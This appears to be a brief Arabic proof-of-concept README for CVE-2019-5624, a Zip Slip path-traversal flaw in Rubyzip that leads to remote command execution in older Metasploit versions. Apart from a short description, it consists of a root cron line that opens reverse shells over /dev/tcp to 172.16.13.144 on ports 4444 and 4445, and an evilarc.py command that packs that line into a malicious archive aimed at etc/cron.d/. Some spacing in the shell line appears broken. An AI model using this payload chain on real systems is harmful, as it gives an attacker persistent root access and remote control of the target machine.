
إثبات مفهوم لثغرة CVE-2019-5624 في Metasploit (معالجة ZIP غير آمنة في Rubyzip تؤدي إلى تنفيذ أوامر عن بُعد)
إثبات مفهوم لثغرة CVE-2019-5624 الخاصة بـ Metasploit (معالجة ZIP غير آمنة في Rubyzip تؤدي إلى RCE)
في فبراير 2019، اكتشفت ثغرة جديدة في مكتبة Rubyzip. تسمح للمهاجم باستغلال معالجة ZIP غير آمنة (Zip Slip) مما يؤدي إلى تنفيذ أوامر عن بُعد.
تم استغلال هذه الثغرة لاستهداف جميع إصدارات Metasploit الأقل من 5.0.18 Metasploit Wrap-Up
لقد أعددت منشور مدونة مفصلاً يشرح الثغرة.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/